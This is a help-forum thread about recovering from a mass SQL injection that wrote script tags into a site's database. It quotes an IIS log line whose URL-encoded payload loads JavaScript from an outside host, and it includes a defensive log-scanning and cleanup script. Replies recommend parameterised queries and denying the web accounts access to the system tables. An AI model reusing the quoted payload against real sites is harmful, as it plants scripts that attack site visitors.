SQL Injection


Problem description

- - - - - - - - - IIS Log File Entry - - - - - - - - - - - - - - - -
GET /sresult.asp
title=(Your%20Love%20Keeps%20Lifting%20Me)%20Higher%20And%20Higher&artist=Michael%20McDonald&type=%25&category=%25&column=t_asc%3Cscript%20src=
http://www.advabnr.com/b.js%3E%3C/script%3E 80 - 76.16.112.66 HTTP/1.1
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

My table was evidently hit with SQL Injection. I searched the IIS logs and
found hundreds of the below instances. Questions...

1) The end result was my image columns were updated to reflect:
Original data: files/icons/ps987_75.jpg
Updated data: files/icons/ps987_75.jpg<script
src=http://www.advabnr.com/b.js></script>
Thousands of records were updated like the above.
I tried downloading http://www.advabnr.com/b.js to see what's inside, but it
wasn't available.
What could have been in the js file to cause such an update?

2) I don't see how they could have known the Table name or the column names.
Same question as #1 I guess.

3) I was and still am using a stored procedure on that page to SELECT from
the table. How do I stop similar malicious efforts from happening again?

thanks
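
A triage sketch for the kind of log entry and column damage described in the question above, as an added example that is not part of the original thread: it walks W3C-format IIS log lines, flags any query parameter that decodes to a `<script src=...>` tag, and strips such a tag from a stored value. The `#Fields:` order, the IP addresses and the `js.example.test` URL are constructed for the sample.

```python
import re
from urllib.parse import parse_qsl

# <script ... src=URL ...></script>, quoted or unquoted src, any letter case.
SCRIPT_TAG = re.compile(
    r"<\s*script\b[^>]*?\bsrc\s*=\s*[\"']?([^\s\"'>]+)[^>]*>\s*<\s*/\s*script\s*>",
    re.IGNORECASE,
)

# Constructed sample (not the poster's log). The #Fields order is an assumption
# chosen to match the layout of the entry quoted in the thread.
SAMPLE_LOG = """\
#Fields: cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs-version
GET /sresult.asp title=Higher%20And%20Higher&type=%25&column=t_asc 80 - 203.0.113.5 HTTP/1.1
GET /sresult.asp title=Higher%20And%20Higher&type=%25&column=t_asc%3Cscript%20src=http://js.example.test/b.js%3E%3C/script%3E 80 - 203.0.113.9 HTTP/1.1
"""

def scan_iis_log(lines):
    """Return one finding per query parameter that decodes to a script tag."""
    fields, findings = [], []
    for line in lines:
        line = line.strip()
        if line.startswith("#Fields:"):          # W3C header names the columns
            fields = line[len("#Fields:"):].split()
            continue
        if not line or line.startswith("#") or not fields:
            continue
        row = dict(zip(fields, line.split()))
        query = row.get("cs-uri-query", "-")
        if query == "-":                          # IIS logs "-" for an empty query
            continue
        # Split on & and = first, then decode, so %26/%3D cannot shift fields.
        for name, value in parse_qsl(query, keep_blank_values=True):
            match = SCRIPT_TAG.search(value)
            if match:
                findings.append({"ip": row.get("c-ip"), "page": row.get("cs-uri-stem"),
                                 "param": name, "script_src": match.group(1)})
    return findings

def strip_injected_tag(value):
    """Return (value without injected script tags, list of script URLs removed)."""
    return SCRIPT_TAG.sub("", value), SCRIPT_TAG.findall(value)

if __name__ == "__main__":
    for finding in scan_iis_log(SAMPLE_LOG.splitlines()):
        print(finding)
    print(strip_injected_tag("files/icons/ps987_75.jpg<script src=http://js.example.test/b.js></script>"))
```

Run the cleanup against a copy of the affected columns first and review the list of removed URLs before writing anything back.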

Recommended answer

shank wrote:

- - - - - - - - - IIS Log File Entry - - - - - - - - - - - - - - - -
GET /sresult.asp
title=(Your%20Love%20Keeps%20Lifting%20Me)%20Higher%20And%20Higher&artist=Michael%20McDonald&type=%25&category=%25&column=t_asc%3Cscript%20src=
http://www.advabnr.com/b.js%3E%3C/script%3E 80 - 76.16.112.66 HTTP/1.1
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

My table was evidently hit with SQL Injection. I searched the IIS
logs and found hundreds of the below instances. Questions...

1) The end result was my image columns were updated to reflect:
Original data: files/icons/ps987_75.jpg
Updated data: files/icons/ps987_75.jpg<script
src=http://www.advabnr.com/b.js></script>
Thousands of records were updated like the above.
I tried downloading http://www.advabnr.com/b.js to see what's inside,
but it wasn't available.
What could have been in the js file to cause such an update?

http://mvp.unixwiz.net/techtips/sql-injection.html
http://www.sqlsecurity.com/DesktopDefault.aspx?tabid=23
http://www.nextgenss.com/papers/adva..._injection.pdf
http://www.nextgenss.com/papers/more..._injection.pdf

2) I don't see how they could have known the Table name or the column
names. Same question as #1 I guess.




Same answer - by causing error messages that poor coding practice allows to
be returned to the user.


3) I was and still am using a stored procedure on that page to SELECT
from the table. How do I stop similar malicious efforts from happening
again?



Use parameters:
http://groups.google.com/group/micro...fedf4e1efd63a6
--
Microsoft MVP - ASP/ASP.NET
Please reply to the newsgroup. This email account is my spam trap so I
don't check it very often. If you must reply off-line, then remove the
"NO SPAM"





"Bob Barrows [MVP]" wrote:

shank wrote:

2) I don't see how they could have known the Table name or the column
names. Same question as #1 I guess.



Same answer - by causing error messages that poor coding practice allows to
be returned to the user.



No, not really. Oh, it's poor coding practice, but the original injection
(not seen here) is code that goes and reads the system tables and tries to
discover all user table names and all user VARCHAR, NVARCHAR, TEXT, NTEXT
field names and *THEN* injects the JavaScript into all those fields.

It's pretty sophisticated, actually. But it's easily protected against by
simply disallowing access to the system tables from the IUSR_xxx and IWAM_xxx
accounts. (Well, and of course by practicing good programming of the ASP
page in the first place. But even with poor ASP code, if you set up the DB
correctly the particular attack fails.)

If you care, I think I can find a copy of the actual injection attack code
still lurking, showing how it loops on all the tables and fields.


Here's an example of how it was originally injected into at least one web
site and thus database:

http://www.aspmessageboard.com/forum...997&P=1#894984

The next post is my decoding of that and then Xander's post has a link to
here:
http://isc.sans.org/diary.html?n&storyid=4294
that explains the whole process even more.

